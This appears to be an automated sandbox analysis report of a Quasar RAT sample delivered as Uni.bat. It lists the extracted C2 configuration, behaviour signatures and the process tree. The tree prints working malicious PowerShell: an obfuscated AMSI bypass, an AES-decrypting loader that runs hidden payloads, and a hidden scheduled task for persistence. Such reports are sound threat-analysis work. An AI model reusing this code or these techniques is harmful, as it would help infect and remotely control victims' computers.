Analysis
-
max time kernel
300s -
max time network
260s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
14-05-2024 20:30
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-AidubAN29rBfWYM23w
Attributes
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 18 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8d270833-923a-46c5-8fa9-68ee0dd04d06}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f6c7e7a3-fe92-4237-9aa9-a69f62c83af9}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UrpccseDxPsG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQTUterbvHBIxE,[Parameter(Position=1)][Type]$WXxiytiDmU)$nroGedzZSVZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'dD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nroGedzZSVZ.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQTUterbvHBIxE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nroGedzZSVZ.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+'d'+'eB'+'y'+''+[Char](83)+'ig,'+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$WXxiytiDmU,$jQTUterbvHBIxE).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $nroGedzZSVZ.CreateType();}$DODpLOnFksKcP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+'em.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$oDjiOhHAGHWQNV=$DODpLOnFksKcP.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pro'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+',S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JhUSuyUUnjupDQaWKDN=UrpccseDxPsG @([String])([IntPtr]);$oWHmiumCDkrFaLVDxBOzaj=UrpccseDxPsG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uLmyNPzugee=$DODpLOnFksKcP.GetMethod(''+[Char](71)+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$sEmfXrCZfAstme=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$uLmyNPzugee,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$GdRENnwGcYvkloHLd=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$uLmyNPzugee,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+'t'+'')));$vPgmhha=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sEmfXrCZfAstme,$JhUSuyUUnjupDQaWKDN).Invoke(''+'a'+'m'+[Char](115)+'i'+'.'+''+'d'+'l'+[Char](108)+'');$uVQmZSjSGubsATebz=$oDjiOhHAGHWQNV.Invoke($Null,@([Object]$vPgmhha,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$XsJDotkpKL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdRENnwGcYvkloHLd,$oWHmiumCDkrFaLVDxBOzaj).Invoke($uVQmZSjSGubsATebz,[uint32]8,4,[ref]$XsJDotkpKL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uVQmZSjSGubsATebz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdRENnwGcYvkloHLd,$oWHmiumCDkrFaLVDxBOzaj).Invoke($uVQmZSjSGubsATebz,[uint32]8,0x20,[ref]$XsJDotkpKL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZQNyOTmGcucG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TJjJTDZYERDFZl,[Parameter(Position=1)][Type]$VtglJpHUzI)$aaFRHMhVWBt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'lec'+[Char](116)+'e'+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',Se'+'a'+''+[Char](108)+'e'+[Char](100)+''+','+''+'A'+''+[Char](110)+'s'+'i'+'C'+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+'C'+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$aaFRHMhVWBt.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'ByS'+'i'+'g'+[Char](44)+'P'+'u'+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TJjJTDZYERDFZl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$aaFRHMhVWBt.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+'i'+''+[Char](114)+''+'t'+''+'u'+'a'+[Char](108)+'',$VtglJpHUzI,$TJjJTDZYERDFZl).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $aaFRHMhVWBt.CreateType();}$iFZsQzxEdxkoM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+'ft'+'.'+'W'+[Char](105)+''+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+'a'+[Char](116)+''+'i'+'v'+'e'+''+'M'+''+'e'+''+[Char](116)+'hod'+[Char](115)+'');$QBepLGYtUXKJzT=$iFZsQzxEdxkoM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'dd'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SSelmtnaFRHeZEJJvyM=ZQNyOTmGcucG @([String])([IntPtr]);$lmgyrAElOuQwxjNwPXfHFK=ZQNyOTmGcucG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zNSnNzlgkvI=$iFZsQzxEdxkoM.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+'le'+[Char](72)+'a'+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+[Char](108)+''+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ITHIEGuyaDtqci=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$zNSnNzlgkvI,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+'A')));$aFdLaLBiJqefOgWLC=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$zNSnNzlgkvI,[Object](''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$CsaRoKd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ITHIEGuyaDtqci,$SSelmtnaFRHeZEJJvyM).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+'d'+'l'+[Char](108)+'');$HLQXhdPSUgXTqqktb=$QBepLGYtUXKJzT.Invoke($Null,@([Object]$CsaRoKd,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$ttWCnngniC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aFdLaLBiJqefOgWLC,$lmgyrAElOuQwxjNwPXfHFK).Invoke($HLQXhdPSUgXTqqktb,[uint32]8,4,[ref]$ttWCnngniC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HLQXhdPSUgXTqqktb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aFdLaLBiJqefOgWLC,$lmgyrAElOuQwxjNwPXfHFK).Invoke($HLQXhdPSUgXTqqktb,[uint32]8,0x20,[ref]$ttWCnngniC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_392_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_392.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_392.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_392.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_392.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_392.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGJD5csip1tk.bat" "7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
